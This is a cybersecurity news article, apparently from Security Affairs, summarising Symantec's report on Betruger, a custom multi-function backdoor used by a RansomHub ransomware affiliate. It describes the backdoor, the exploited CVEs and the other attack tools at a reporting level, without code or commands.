RansomHub Affiliate Uses Custom Backdoor Betruger

Researchers at Symantec have made a groundbreaking discovery, linking a custom backdoor called Betruger to an affiliate of the notorious RansomHub operation. Betruger is a multi-function tool designed specifically for carrying out ransomware attacks, combining features such as screenshot capture, credential theft, keystroke logging, network scanning, and privilege escalation into a single, streamlined package.

The Symantec Threat Hunter team identified Betruger in recent ransomware attacks, noting its unique design which minimizes detection. By incorporating multiple functions into one tool, Betruger reduces the need for multiple tools and lowers the attack footprint, making it an attractive option for RansomHub affiliates looking to simplify their operations.

"The Symantec Threat Hunter team has observed activity from a custom backdoor that can be tied to a RansomHub affiliate," reads the analysis published by Symantec. "RansomHub is a Ransomware-as-a-Service offering and the backdoor has been named Betruger." This multi-function backdoor appears to have been developed specifically for carrying out ransomware attacks, incorporating functionality typically seen across multiple tools.

Ransomware groups usually rely on legitimate tools and public malware like Mimikatz and Cobalt Strike. However, custom tools are rare but used for data theft, such as Exmatter and Exbyte. Betruger backdoor is disguised as "mailer.exe" or "turbomailer.exe," the researchers noticed that lacks mailing functions, likely to appear legitimate.

Experts believe that Betruger may have been developed to minimize the amount of new tools dropped on a targeted network during a ransomware attack. RansomHub affiliates use many other tools, and the group also exploits techniques like BYOVD to disable security mechanisms.

Attackers use vulnerabilities like CVE-2022-24521 and CVE-2023-27532 to escalate privileges and leak credentials. Additional tools in recent attacks include Impacket, Stowaway Proxy, Rclone, Mimikatz, SystemBC, and several remote access tools like ScreenConnect, Atera, and Splashtop, all aiding in data exfiltration and remote access during ransomware campaigns.

"The Betruger backdoor was deployed in several recent RansomHub attacks, suggesting that it is available to at least one affiliate," concludes the report. "RansomHub is a RaaS operation run by a cybercrime group Symantec calls Greenbottle." Active since February 2024, Greenbottle has quickly grown RansomHub, becoming the most prolific ransomware operation by the third quarter of 2024, responsible for the highest number of claimed attacks.

"The group has reportedly won over many affiliates by offering them better terms compared to rival operations, such as a great percentage of ransom payments and a payment model where the affiliate is paid by the victim before passing on the operator’s cut," notes the report. This trend highlights the ever-evolving landscape of cybercrime, with groups continually adapting and innovating to stay ahead of security measures.

Stay Informed

Follow us on Twitter: @securityaffairs and Facebook and Mastodon for the latest updates on cybersecurity threats and trends.